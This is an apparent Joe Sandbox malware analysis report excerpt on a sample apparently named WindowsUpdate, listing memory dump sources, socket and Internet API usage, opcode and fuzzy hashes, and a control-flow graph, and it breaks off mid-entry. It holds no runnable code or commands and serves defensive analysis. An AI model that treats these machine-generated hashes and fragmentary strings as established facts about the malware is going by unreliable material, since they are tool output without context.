    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: NameSocketUser
    • String ID: :$\
    • API String ID: 1092631813-1166558509
    • Opcode ID: 6b67cbf96f5fdd912783bcbec37cf04faf200a28232907d3d2e10b415d149f39
    • Instruction ID: a1d57ba651cee8f7a5c5e9090d0fd58578cc81390eb5b4a87ffb178d98ebd0f1
    • Opcode Fuzzy Hash: 6b67cbf96f5fdd912783bcbec37cf04faf200a28232907d3d2e10b415d149f39
    • Instruction Fuzzy Hash: F371B77461CB488FE791EB28C458B9AFBF1FBDA350F40495DA089C32A2DB74D855CB42

    Control-flow Graph

    control_flow_graph 100 7ff7300a1190-7ff7300a1210 call 7ff7300a1000 call 7ff7300a1090 call 7ff7300a1610 107 7ff7300a1216-7ff7300a1232 call 7ff7300a1090 call 7ff7300a1610 100->107 108 7ff7300a15da 100->108 107->108 116 7ff7300a1238-7ff7300a1253 call 7ff7300a1090 call 7ff7300a1610 107->116 109 7ff7300a15df-7ff7300a1605 call 7ff7300a1a20 108->109 116->108 121 7ff7300a1259-7ff7300a1274 call 7ff7300a1090 call 7ff7300a1610 116->121 121->108 126 7ff7300a127a-7ff7300a1295 call 7ff7300a1090 call 7ff7300a1610 121->126 126->108 131 7ff7300a129b-7ff7300a12b6 call 7ff7300a1090 call 7ff7300a1610 126->131 131->108 136 7ff7300a12bc-7ff7300a12d7 call 7ff7300a1090 call 7ff7300a1610 131->136 136->108 141 7ff7300a12dd-7ff7300a1384 call 7ff7300a1000 call 7ff7300a1090 call 7ff7300a1000 call 7ff7300a1090 call 7ff7300a19e0 call 7ff7300a19ee 136->141 154 7ff7300a1386-7ff7300a1389 141->154 155 7ff7300a138e-7ff7300a13bc call 7ff7300a19e0 call 7ff7300a19ee 141->155 156 7ff7300a1449-7ff7300a1494 call 7ff7300a19e0 call 7ff7300a19ee 154->156 165 7ff7300a13f1-7ff7300a1404 call 7ff7300a19e0 call 7ff7300a19ee 155->165 166 7ff7300a13be-7ff7300a13ef call 7ff7300a19e0 call 7ff7300a19ee call 7ff7300a19e0 call 7ff7300a19ee 155->166 156->108 168 7ff7300a149a-7ff7300a14a9 156->168 177 7ff7300a1409-7ff7300a1444 call 7ff7300a19e0 call 7ff7300a19ee call 7ff7300a19e0 call 7ff7300a19ee call 7ff7300a1000 165->177 166->156 171 7ff7300a14b0-7ff7300a14cb call 7ff7300a17a0 168->171 181 7ff7300a14cd-7ff7300a14ef 171->181 177->156 184 7ff7300a14f0-7ff7300a14fb 181->184 184->184 187 7ff7300a14fd-7ff7300a1508 184->187 190 7ff7300a1510-7ff7300a1549 187->190 190->190 191 7ff7300a154b-7ff7300a155d 190->191 193 7ff7300a1560-7ff7300a159d 191->193 193->193 196 7ff7300a159f-7ff7300a15ca call 7ff7300a19e0 call 7ff7300a19ee 193->196 202 7ff7300a15cf-7ff7300a15d1 196->202 202->108 203 7ff7300a15d3-7ff7300a15d8 202->203 203->109
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID: 3232fdee-9343-fac4-2efe-1688a2430753$:$chak$ra.d
    • API String ID: 0-3551511372
    • Opcode ID: 7624542515975530169df7396423b09116c364160f120eae1ee0144e5746f4bb
    • Instruction ID: 68625ddee92903d7e5d4f9f4fedd47f202cca1761d786dd9cd76b60b232a9861
    • Opcode Fuzzy Hash: 7624542515975530169df7396423b09116c364160f120eae1ee0144e5746f4bb
    • Instruction Fuzzy Hash: 2BC1A322B0878195E710EB79D4612FEA761FB8478CF844231EE9D4B78EDE38E561D360

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
    • String ID:
    • API String ID: 120244420-0
    • Opcode ID: 0b44bb002a0341e30d57d8a1f4708f56a702b3bb2d96e1425164fb690bbbdbb0
    • Instruction ID: 771fabbb09b008622b5b5172c2610e1adcda3a5896e15d44f6150a1e59f984d7
    • Opcode Fuzzy Hash: 0b44bb002a0341e30d57d8a1f4708f56a702b3bb2d96e1425164fb690bbbdbb0
    • Instruction Fuzzy Hash: E8311A21E0D14261FA14BB29E4513F9A391AF9578CFC44034EA5E0B7DFDE2DB875A231

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: Internet$AvailableCloseDataHandleQuery
    • String ID:
    • API String ID: 1327592154-0
    • Opcode ID: 0ae40c8b48997cceaf44f927dc327f8fc444c47c9378a20578f9eac3801fbe4d
    • Instruction ID: 268480b23f19e3b079f70738745a8b96a5d69014f51a4cba8ff6d87512d94662
    • Opcode Fuzzy Hash: 0ae40c8b48997cceaf44f927dc327f8fc444c47c9378a20578f9eac3801fbe4d
    • Instruction Fuzzy Hash: 46B1EC7021CB848FE765DB28C458BAAB7F1FBE9311F10492DE58AD32D1DB749845CB42

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: IoctlSocket
    • String ID:
    • API String ID: 1409745359-0
    • Opcode ID: f5edf3158a1fce50c76962070a6b834027b3dbd5ded2b52cdb69df401b67b406
    • Instruction ID: d42ffc8f42efc4c032f92e1d1c00733b61e61a7a6281d19b7143294a6b06b661
    • Opcode Fuzzy Hash: f5edf3158a1fce50c76962070a6b834027b3dbd5ded2b52cdb69df401b67b406
    • Instruction Fuzzy Hash: FE41E8B421CB888FE750DF68C44979AFBE1FBD9354F50492DA09AC2291EBB8D455CB02

    Control-flow Graph

    Control-flow graph (rendered image; legend: Executed / Not Executed): blocks 217700e2574-217700e25b0. The entry block 217700e2574-217700e2577 either jumps straight to the exit at 217700e25b0 or runs 217700e2579-217700e2592, which calls RtlFreeHeap; from there it either passes through 217700e2594-217700e25a9 (calls 217700e2b70 then 217700e2ab8) or goes directly to 217700e25ab-217700e25af, and both paths end at 217700e25b0.
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 8252616606155db50ddcc3771ec12ad1a19af76dd93a1f1e9192e2708b2bc207
    • Instruction ID: 37a95046e440881931922973b736fab2851f9e9d36842f63c67c0c94d2a78b50
    • Opcode Fuzzy Hash: 8252616606155db50ddcc3771ec12ad1a19af76dd93a1f1e9192e2708b2bc207
    • Instruction Fuzzy Hash: 6BE08670705A0D47FB29BBB9DC9D37472E1DBA9211F04056DA801E22D1EA248841C781

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: f5be3fde2838ca046ca0ae8bd03b28dcec00575a1dc3ba35c2c716bc36948d0e
    • Instruction ID: 630faa483df53fb4f58df00c44bac0ae52c57c0441cb2cc885bb6dc07848a463
    • Opcode Fuzzy Hash: f5be3fde2838ca046ca0ae8bd03b28dcec00575a1dc3ba35c2c716bc36948d0e
    • Instruction Fuzzy Hash: 2D113DB051C6448FE665AB68C40C7AEF6E1FBE6364F50092EE085C21E0CB748856CB52

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
    • String ID:
    • API String ID: 313767242-0
    • Opcode ID: ba1b179b665aa6e95bad836ca2731368ce91ff4628614d0814662aa935004a02
    • Instruction ID: 4b766876888369ecbe20fddfeeb68151478885f15009a4dfa83130bf8189e20b
    • Opcode Fuzzy Hash: ba1b179b665aa6e95bad836ca2731368ce91ff4628614d0814662aa935004a02
    • Instruction Fuzzy Hash: 6D31A372609B81A5EB609F64E8507EEB360FB94348F844439DB4E47B88DF3CE168D724
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
    • String ID:
    • API String ID: 2933794660-0
    • Opcode ID: 1f5a085ac05ca1c8060332f51e9b29c6db783efad3389300f5c10334ede8024c
    • Instruction ID: 91e67fd4180956b0e753002939ce8471175675b5a683f7133050a2a6d35aa772
    • Opcode Fuzzy Hash: 1f5a085ac05ca1c8060332f51e9b29c6db783efad3389300f5c10334ede8024c
    • Instruction Fuzzy Hash: A1119126B04F0199EB00DF74E8542B973A0F759718F400E30EF2D42B58DF78E1689360
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _clrfp
    • String ID:
    • API String ID: 3618594692-0
    • Opcode ID: 5de82274a40e6f25d83ed8c572f8826b578c545ec17eae2ae53d901e69cfe7cf
    • Instruction ID: b4ccf69ffc9c8592c304359b1131fb82193ab6aef659ef6ce3c55ae1f0e2168e
    • Opcode Fuzzy Hash: 5de82274a40e6f25d83ed8c572f8826b578c545ec17eae2ae53d901e69cfe7cf
    • Instruction Fuzzy Hash: 10C1AF31114A4D8FEB99DF1CC48ABA577F0FBAA314F558499E859DB2E1C335D852CB00
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: 0
    • API String ID: 3215553584-4108050209
    • Opcode ID: cfd14bc4126215dd6b17d6b904430df3e97191f6032318430beb662dcd74d319
    • Instruction ID: bef567fbe601eb4d7e3dd77c39dd4fe743933795749674af2dbbca90c771605c
    • Opcode Fuzzy Hash: cfd14bc4126215dd6b17d6b904430df3e97191f6032318430beb662dcd74d319
    • Instruction Fuzzy Hash: 0681B93021C6C54AFBAEAA18849D3E9F7E1EBE732CF24155DD449C72C3CA10C867D662
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fd3d377db4ee0e36e1021f135c1832d73f1b94c5c0fddee8f192b3a34a77baf9
    • Instruction ID: 5a1eca24f96510aa1ba8531ec7426c50f92094130424a66fcd7fa7bcb74f6efc
    • Opcode Fuzzy Hash: fd3d377db4ee0e36e1021f135c1832d73f1b94c5c0fddee8f192b3a34a77baf9
    • Instruction Fuzzy Hash: 6352D87062C3A44BD32D8E2A589113ABBE5E7CB307F04827EE9D7D7683C93454079B99
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5c698153fd8d3b07954fe4b2c4fb2412659150fa673a53b712d63bdd8769bf65
    • Instruction ID: 822f0f23f41aaa74399711869f96514aab8e89347900ef3b0fe6a9466939d170
    • Opcode Fuzzy Hash: 5c698153fd8d3b07954fe4b2c4fb2412659150fa673a53b712d63bdd8769bf65
    • Instruction Fuzzy Hash: 9722F0356249064BE35CDA38CACF6A273E0F7693457641279DCCBC7686E920D4E3CAC6
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 45aa55cddd529bacec51f2f453c6186f03824f063f435d0257531b2cda0afce3
    • Instruction ID: 48fda8c8c3f805e6f7678a5e79bac292a4d0a61cae5740392e1e4bf481dbe1c4
    • Opcode Fuzzy Hash: 45aa55cddd529bacec51f2f453c6186f03824f063f435d0257531b2cda0afce3
    • Instruction Fuzzy Hash: 1E22077090C6A48BC71D8E5E9892474B7E1FB85309B15836DE9DBD7583CA3C6823DBE0
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c9f83316896254c9c14ff747b585c2f32f23a182ec8a7e03346608f3dbd1bd08
    • Instruction ID: 78734cf2f0919e7fb67a3192f847eb72fee69666f567a913b1c90ec380718632
    • Opcode Fuzzy Hash: c9f83316896254c9c14ff747b585c2f32f23a182ec8a7e03346608f3dbd1bd08
    • Instruction Fuzzy Hash: D622573150C5A54BD70D8E1EA892074B7E2FB8530A71492BEEDD797683C93CA423DBE0
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 971f15471437d8ad3083ae0bb5d5feac1a7ff2488c6f59d32790ac4fd9e5387a
    • Instruction ID: 8c491c232c7d29f8fb5208947774faa785faa7d14f243b440526bfbd76952329
    • Opcode Fuzzy Hash: 971f15471437d8ad3083ae0bb5d5feac1a7ff2488c6f59d32790ac4fd9e5387a
    • Instruction Fuzzy Hash: 4902C32032CD5947F71C962D9889921B3C2F7E4309B6083AEF896D76E3DC34E4A6D295
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 78a1653a917feb94fdfcf1961e5bd8166bca02a8f5a86504f8464925216df68c
    • Instruction ID: e2d12b239f6051b8bb0646bfd9331c2145c3d1ad6c7ba1672d441d7bb27232f2
    • Opcode Fuzzy Hash: 78a1653a917feb94fdfcf1961e5bd8166bca02a8f5a86504f8464925216df68c
    • Instruction Fuzzy Hash: FB1294312249050BC31ECD389CA5177B3D1F7C830E7699A6DE9C3D7986DD38A8639B85
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6cf422fea4e083ce0483a5c69a5b82fdc7b8d43ce8b7062314ebca9ab462ba9c
    • Instruction ID: 57c53c5f74acecc5bdce3b75a48dcbee3099fc18401dbe958d645a09e2981cbc
    • Opcode Fuzzy Hash: 6cf422fea4e083ce0483a5c69a5b82fdc7b8d43ce8b7062314ebca9ab462ba9c
    • Instruction Fuzzy Hash: B1F1A53052CE4D4AEB6AAB589C587EAF3F1FBF7368F040229D406D71D1DA70D842C681
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 120508a974eec2239ea787ca40a1081c0a92d259c30b287eae7a6934806f566f
    • Instruction ID: a7eeafc5e9890b8248e2663c20a14762260a7c09340d2e6e5b911697b8d50b53
    • Opcode Fuzzy Hash: 120508a974eec2239ea787ca40a1081c0a92d259c30b287eae7a6934806f566f
    • Instruction Fuzzy Hash: 4BE10430614A044FD329DE1DE9C8661B3E1FB8930EF24827DD9CAC7287DA35E4578AD5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6541c96e8e0885c1fb6b6403957449a9a04c8d314077148ca5805578a927d4c5
    • Instruction ID: 07e4ef3cc621a62232dbd4444c90a7c6201c08a4c092a2adce67d2ad74ea483d
    • Opcode Fuzzy Hash: 6541c96e8e0885c1fb6b6403957449a9a04c8d314077148ca5805578a927d4c5
    • Instruction Fuzzy Hash: D6E10430614A044FD329DE1DE9C8661B3E1FB8930DF24827DD9CAC7287DA39E4578AD5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: dd01f6c7e838bd7b7996199fedc7117c25cf5638f24122168e22016455e241a3
    • Instruction ID: 7d72833529e51b2561f7a7359493c138d3f85b4bc8021b782bfc37c0c4b091ed
    • Opcode Fuzzy Hash: dd01f6c7e838bd7b7996199fedc7117c25cf5638f24122168e22016455e241a3
    • Instruction Fuzzy Hash: E9D1E330624A094BE74DDE38C9CE6A273E0F7A9355760426DDCCBC7696DA30D493C6C5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 79fa3d8491be301e8f17d7e1e015c785c77767cabc404a44b6b6a423bf5eb159
    • Instruction ID: d55e3da6c41cfb96cc364c2943c55d8b61da2a156cfb5747e2c9685b489868e3
    • Opcode Fuzzy Hash: 79fa3d8491be301e8f17d7e1e015c785c77767cabc404a44b6b6a423bf5eb159
    • Instruction Fuzzy Hash: 79C13E3677484507E74D842CEC673B922D3E7D530EB28D23CEA97D66C6D86C89538A44
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd979db52178002ccb5b82c099e33db150f3668ce11a2263a480204cac049ffb
    • Instruction ID: aba2b44ce6545c6217f65210b2e39361ebdab45bf16fccaaadaea29586868f7c
    • Opcode Fuzzy Hash: bd979db52178002ccb5b82c099e33db150f3668ce11a2263a480204cac049ffb
    • Instruction Fuzzy Hash: 06E1F631A0CE4C4BEB26AB6899497EDF7B1FBB6311F50479AD442D31C6EE209946C7C0
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: db9e5d6d5b6cd3e5ed5117f1183f8c2e9152f7bcf2b339abb80a4dc2c9a15466
    • Instruction ID: e2cd978da60b05b9fedafae0661b9b54f04c5793b2d65c5287e283986ed330ba
    • Opcode Fuzzy Hash: db9e5d6d5b6cd3e5ed5117f1183f8c2e9152f7bcf2b339abb80a4dc2c9a15466
    • Instruction Fuzzy Hash: 62C14D7156CF890BD71AA6289C4A3B9F3E0F7D7315F54172EE9CAC31C2EA25C4538682
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d48b6acafc2b7e77bbaa3fcdd0f83935027b9bb90542e2d9777655524157c5dc
    • Instruction ID: e22f5363335d2af1ed37897c2863da0144b8beb3509d275214d8634c7a73cadc
    • Opcode Fuzzy Hash: d48b6acafc2b7e77bbaa3fcdd0f83935027b9bb90542e2d9777655524157c5dc
    • Instruction Fuzzy Hash: FFA1043176CE580B975CAA6C9C8B17177C4E7DD212B04827FFC89C32A2E924D99387C6
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 62ea63dc45793a91f35addbd86c675086eaeb1489714cc4cf96ecd6a9d554ec0
    • Instruction ID: c280a083edb256e120971fad3ea934cc6e33bb65dca0a39395b3b8f6799efd56
    • Opcode Fuzzy Hash: 62ea63dc45793a91f35addbd86c675086eaeb1489714cc4cf96ecd6a9d554ec0
    • Instruction Fuzzy Hash: ECB11B3051CF484BEB67AA2898497E6F3E1EFE7310F50072EE486D31D2EB64D586C685
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d20e6e6e1e3f0f7b6a3f41f3c005f27ca2412777a6d734776a30905dd6d01120
    • Instruction ID: 98b1249b713fa6fba1852999f6e1c676ec1638559bd0e673d52f42d67766cdd2
    • Opcode Fuzzy Hash: d20e6e6e1e3f0f7b6a3f41f3c005f27ca2412777a6d734776a30905dd6d01120
    • Instruction Fuzzy Hash: B3D15F20119ACA9FDB45CF6C84C49957FB0FB7A241B4842DAEC88CF687C224D6E5C7E1
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 16bcd64f8ccda112741447d0564fe755dfd273f25f0f336a09b67f2b3cc2ada2
    • Instruction ID: b566b26afd88a6ade39b6aa371ae819e085a4ec6759a95f07bd22a8df4f2785d
    • Opcode Fuzzy Hash: 16bcd64f8ccda112741447d0564fe755dfd273f25f0f336a09b67f2b3cc2ada2
    • Instruction Fuzzy Hash: 8291382061C6E50E930D466E18A9031BFD0EB9A307329C2BEF9DFD7593C8289413DBE5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2acc2b19f55320736815efa034f58209f5246b8a49aac5063f6cafa8d7fafdae
    • Instruction ID: 30109c754541bdfe6d601b3dce0bc277c4b319ecd9b22d126cedb8f0af165ae6
    • Opcode Fuzzy Hash: 2acc2b19f55320736815efa034f58209f5246b8a49aac5063f6cafa8d7fafdae
    • Instruction Fuzzy Hash: B49165316186458FD70CEE2CD8566F5B3D2F7CA309F14863ED9CBC7682EA3895068B41
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fa69c09274c5eae73456c7e50fb70b7679c7c2ff16848e9009f6ee66f8f23c8a
    • Instruction ID: e7abea0c7116ce6815be1a3cc41ade13f91c76c924f25bf859002fb63e24adfb
    • Opcode Fuzzy Hash: fa69c09274c5eae73456c7e50fb70b7679c7c2ff16848e9009f6ee66f8f23c8a
    • Instruction Fuzzy Hash: 8C7160B1A587018BD70CCE18D8824A1B3E5FB89315B24D16DE987CB207EA34E457CE89
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c236e7935cfbc988d5430de56f90fa4ea90af69f7556ffc36c01ab66d8ae1d23
    • Instruction ID: eacb6446bdf5979e4ba6a0872e399316a6a456744fc9f3cf10eeee52e0c6cce3
    • Opcode Fuzzy Hash: c236e7935cfbc988d5430de56f90fa4ea90af69f7556ffc36c01ab66d8ae1d23
    • Instruction Fuzzy Hash: 2381FC3050CF984FDB65EF2884986B1FBE0FBA9310F0546AED8C9C7166DA20E559C791
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
